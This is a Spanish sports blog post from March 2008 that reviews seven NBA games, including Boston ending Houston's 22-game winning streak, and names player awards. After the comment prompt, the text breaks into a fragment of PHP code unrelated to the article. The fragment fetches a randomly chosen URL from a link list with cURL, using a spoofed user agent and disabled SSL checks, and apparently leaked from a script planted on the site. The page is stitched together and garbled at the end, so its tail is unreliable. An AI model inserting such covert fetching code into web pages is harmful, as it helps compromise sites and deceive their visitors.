La crónica (19/03/08)

19 de March de 2008 por telekoman

La noche nos ha deparado 7 intensos partidos con resultados y conclusiones para todos los gustos. La más vistosa sin duda es el fin de la segunda mejor racha de victorias de la NBA. Han tenido que ser los Boston Celtics y su gran defensa los que frenaran por fin a los Houston Rockets dejando la racha en 22. Otra conclusión es que el que a priori se veía como una integración fácil, la de Kidd en Dallas, no está resultando nada sencilla. Con la derrota de hoy frente a los Lakers, los Mavericks llevan un 0 de 6 frente a equipos con un balance de victorias positivo. Por otro lado, Detroit ganó a Denver en un partido con marcadores altísimos, lo cual es extraño en los Pistons. Los otros 4 partidos siguieron más o menos el guión preestablecido y no dejaron grandes sorpresas. Vamos a ir poco desgranando la jornada, pero antes …

 

 


La crónica:

Esto sí es defensaEn el partido más madrugador de la jornada, los Pistons derrotaron en casa a los Denver Nuggets por 120-136. De esta forma, los pupilos de George Karl suman 120 puntos a los 168 conseguidos contra Seattle en su último partido. Toda una exhibición ofensiva que no tiene reflejo en el otro lado de la pista. La debilidad defensiva de los Nuggets es tan evidente que hasta un equipo poco habituado a tales excesos como Detroit puede permitirse el lujo de llegar a 136 puntos. 7 jugadores de los Pistons se fueron por encima de los 10 puntos con Hamilton liderando al equipo con 24. Wallace, 21 puntos, 5 rebotes y 6 asistencias, Billups, 14 puntos y 10 asistencias, también destacaron. Por Denver, el trío de siempre, Iverson, Anthony y Camby, fueron los más destacados. Denver se mantiene noveno en el Oeste a partido y medio del octavo puesto ocupado por Golden State gracias a la derrota de éstos. Por su parte Detroit está a sólo 3 partidos y medio de asegurar la primera plaza de la División Central.

En uno de los partidos más intrascendentes de la jornada, Miami ganó en Milwaukee por 112-106 gracias a los 21 puntos y 10 asistencias de Jason Williams. Los mejores del partido fueron Mo Williams con 26 puntos y 11 asistencias y Redd con 27 puntos, pero,como durante el resto de la temporada, estas grandes actuaciones les han valido de muy poco. Temporada para la reflexión en las dos franquicias.

Los Nets continúan complicándose la vida de cara a poder acceder a Playoffs y en esta ocasión perdieron en casa de Chicago por un contundente 96-112. El equipo de New Jersey vio como tanNowitzkiVsTuriaf sólo 3 de sus jugadores consiguieron pasar de 10 puntos. Carter con 22 puntos, Jefferson 21 y Marcus Williams con 16 fueron los únicos rescatables del desastre de los Nets, que jugó por segundo partido consecutivo sin Krstic por una infección respiratoria. Chicago se sitúa décimo del Este a sólo un partido de New Jersey, noveno, y 2 de Atlanta, octavo.

Pese a que la diferencia entre Lakers y Mavericks era de 25 puntos al principio del tercer cuarto, el partido se terminó decantando a favor de Los Angeles gracias a un tiro libre de Derek Fisher a falta de 4 segundos que dejaba el marcador en 102-100 y al triple posterior fallado por Nowitzki. Por los Lakers el mejor del partido fue como casi siempre Bryant, aunque sólo 8 de sus 29 puntos fueron en la segunda parte. Odom, con 17 puntos y 17 rebotes, y Radmanovic con 21 y 10 fueron los mejores aliados de Kobe. Tras esta derrota y las 5 anteriores frente a equipos con balance positivo, en Dallas se están preguntando si la incorporación de Kidd ha sido beneficiosa para el equipo. El veterano base ha jugado hoy el peor encuentro con la camiseta texana al quedarse en un punto y 7 asistencias y dejando todo el peso ofensivo en Nowitzki, 35 puntos y 11 rebotes, y Howard y Terry ambos con 19 puntos. Con la victoria, Los Angeles Lakers vuelve a empatar con Houston en el primer puesto de la conferencia Oeste y Dallas se mantiene en el séptimo.

La cara de la decepcionTenían que ser los Celtics quienes pusieran fin a la segunda mejor racha de la historia de la NBA. Boston venció en Houston y dejó en 22 triunfos la marca lograda por los Rockets, que les deja sólo por detrás de las 33 obtenidas por Lakers en 1971. Esta vez, el mal partido de McGrady no se vio compensado por el resto de jugadores y únicamente Scola, con 15 puntos y 8 rebotes, y Mike Harris, con 12-6, salvaron sus estadísticas. Garnett, Pierce y Powe lograron más de 20 puntos cada uno para los Celtics, que sentenciaron el partido en una segunda mitad que dominaron con claridad para acabar llevándose la victoria por 94-74.

En Sacramento, los Warriors no supieron aprovechar la derrota previa de los Nuggets para afianzar su octava posición. Los de Don Nelson cayeron ante los Kings lastrados por las malas actuaciones de Stephen Jackson y Monta Ellis, quienes además se vieron superados por Kevin Martin (34 puntos) y Ron Artest (26). Baron Davis fue el mejor warrior, pero sólo Biedrins y Azubuike cumplieron en su papel y los locales se aseguraron la victoria por 105-122.

Los Suns contaron con una de las mejores versiones que Shaquille O’Neal puede ofrecer a estas alturas en el triunfo de los de Arizona 111-98 sobre los Blazers. Shaq sumó 16 puntos, 15 rebotes, 5 asistencias, 3 tapones y 2 robos en 33 minutos, mientras que Nash y Amare lograron 22 y 25 puntos respectivamente. Por los Blazers, con un Roy desconocido, destacó Aldridge con 31 puntos. Las buenas aportaciones desde el banco deBig Cactus Jack, Outlaw y Frye no fueron suficientes y los Suns se quedan a un solo triunfo de los líderes de conferencia.

Vamos ahora con los jugadores más destacados:

Nuestro MVP: Esta noche tenemos una terna de candidatos muy igualados, dos de ellos en el partido entre Mavs y Lakers, donde encontramos a sus dos máximas figuras, Kobe y Dirk. El primero anotó 29 puntos, 7 asistencias, 3 robos y 2 rebotes, y el segundo 35 puntos. Pero el MVP de hoy se lo damos a Kevin Martin que con sus 34 puntos (13-22 tiros de campo), 7 rebotes, 2 asistencias y 2 robos lideró a su equipo a la victoria en el partido que perdían por 23 puntos en el tercer cuarto ante Golden State Warriors.

 

El rookie: Hoy tenemos muchos rookies con perfil similar. Daequan Cook (12 tantos) o al pistoniano Rodney Stuckey (11 tantos y 6 asistencias) y Michael Harris (12 puntos y 6 rebotes) de los Rockets, pero el premio se lo damos a Luis Alberto Scola, que en 34 minutos hizo 15 puntos y 8 rebotes.

 

La sorpresa: El Big Cactus parece que quiere colocar a los Suns en lo más alto del Oeste, y con partidos como el de ayer lo puede conseguir. 7 de 9 en tiros, 16 puntos, 15 rebotes, 5 asistencias, 2 robos y 3 pinchos para Shaq. Pero la sorpresa de la noche son los 21 puntos de la fuerza de la naturaleza que es Leon Powe, colaborando intensamente en el juego interior céltico para lograr batir a los Rockets.

 

La decepción: El premio se podría dividir también para Stephen Jackson y su penosa racha de anoche 3-15, pero no estamos acostumbrados y casi sorprende más ver tan mal a Brandon Roy con un 3-14 en tiros de campo. Su equipo se resintió y a los “babys” se les escapan los Playoffs. El premio recaería en Jason Kidd, que sólo metió un tiro libre en todo el partido ademas de fallar los 3 tiros de campo que intentó, incluyendo un triple crucial en el último minuto de partido. Los Mavs necesitan que Kidd haga mejores partidos si quieren hacer algo en la postemporada, ya que en Dallas aún no conocen su capacidad para el triple-doble.

El dato: Los 136 puntos de los Pistons son la máxima anotación de la franquicia sin prórrogas desde hacía 18 años, cuando ganaron a Orlando 140-109.

 

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>